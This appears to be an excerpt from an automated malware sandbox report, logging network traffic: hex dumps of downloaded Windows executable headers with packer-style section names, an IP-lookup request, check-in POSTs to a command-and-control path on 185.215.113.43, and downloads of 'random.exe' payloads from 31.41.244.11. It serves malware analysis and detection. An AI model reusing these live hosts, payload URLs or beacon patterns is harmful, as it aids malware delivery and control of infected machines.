01 00 00 00 04 00 00 00 00 00 00 00 00 30 c6 00 00 04 00 00 a5 ba 43 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f f0 72 00 73 00 00 00 00 e0 72 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e9 c5 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 e8 c5 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 72 00 00 10 00 00 00 2a 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 e0 72 00 00 02 00 00 00 3a 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 72 00 00 02 00 00 00 3c 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 37 00 00 00 73 00 00 02 00 00 00 3e 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 6d 67 76 66 78 7a 7a 00 20 1b 00 00 d0 aa 00 00 1c 1b 00 00 40 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 71 68 65 73 77 75 70 00 10 00 00 00 f0 c5 00 00 06 00 00 00 5c 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 c6 00 00 22 00 00 00 62 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Dec 2024 05:03:50 GMTContent-Type: application/octet-streamContent-Length: 1892864Last-Modified: Tue, 17 Dec 2024 04:40:57 GMTConnection: keep-aliveETag: "676100d9-1ce200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 b0 00 00 00 00 00 00 00 60 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 4a 00 00 04 00 00 cc 83 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 48 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 20 05 00 00 04 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 2a 00 00 40 05 00 00 02 00 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 71 7a 6d 78 6b 6b 64 00 60 1a 00 00 f0 2f 00 00 5c 1a 00 00 60 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 62 6a 6a 6d 63 76 75 00 10 00 00 00 50 4a 00 00 04 00 00 00 bc 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 4a 00 00 22 00 00 00 c0 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Dec 2024 05:03:58 GMTContent-Type: application/octet-streamContent-Length: 2959872Last-Modified: Tue, 17 Dec 2024 04:41:09 GMTConnection: keep-aliveETag: "676100e5-2d2a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 60 50 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 50 00 00 04 00 00 ee ab 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 64 6f 79 6a 64 6b 6e 76 00 90 2b 00 00 c0 24 00 00 86 2b 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 6a 76 65 73 64 61 66 00 10 00 00 00 50 50 00 00 04 00 00 00 04 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 50 00 00 22 00 00 00 08 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Dec 2024 05:04:09 GMTContent-Type: application/octet-streamContent-Length: 970240Last-Modified: Tue, 17 Dec 2024 04:39:04 GMTConnection: keep-aliveETag: "67610068-ece00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 59 00 61 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 1e 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 0f 00 00 04 00 00 3d 5d 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 50 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 62 01 00 00 40 0d 00 00 64 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 0e 00 00 76 00 00 00 58 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Dec 2024 05:04:20 GMTContent-Type: application/octet-streamContent-Length: 1717760Last-Modified: Tue, 17 Dec 2024 04:39:31 GMTConnection: keep-aliveETag: "67610083-1a3600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 44 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 44 00 00 04 00 00 ad ae 1a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 05 00 00 00 60 00 00 00 04 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 29 00 00 a0 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 6c 6c 78 6d 78 63 6a 00 e0 19 00 00 60 2a 00 00 d6 19 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 70 67 79 74 63 6d 6d 00 20 00 00 00 40 44 00 00 04 00 00 00 10 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 44 00 00 22 00 00 00 14 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Dec 2024 05:04:31 GMTContent-Type: application/octet-streamContent-Length: 1717760Last-Modified: Tue, 17 Dec 2024 04:39:32 GMTConnection: keep-aliveETag: "67610084-1a3600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 44 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 44 00 00 04 00 00 ad ae 1a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 05 00 00 00 60 00 00 00 04 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 29 00 00 a0 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 6c 6c 78 6d 78 63 6a 00 e0 19 00 00 60 2a 00 00 d6 19 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 70 67 79 74 63 6d 6d 00 20 00 00 00 40 44 00 00 04 00 00 00 10 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 44 00 00 22 00 00 00 14 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Dec 2024 05:04:34 GMTContent-Type: application/octet-streamContent-Length: 2959872Last-Modified: Tue, 17 Dec 2024 04:41:09 GMTConnection: keep-aliveETag: "676100e5-2d2a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 60 50 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 50 00 00 04 00 00 ee ab 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 64 6f 79 6a 64 6b 6e 76 00 90 2b 00 00 c0 24 00 00 86 2b 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 6a 76 65 73 64 61 66 00 10 00 00 00 50 50 00 00 04 00 00 00 04 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 50 00 00 22 00 00 00 08 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 35 32 37 37 33 42 32 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB52773B25C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /files/kosodium/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 34 38 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016489001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
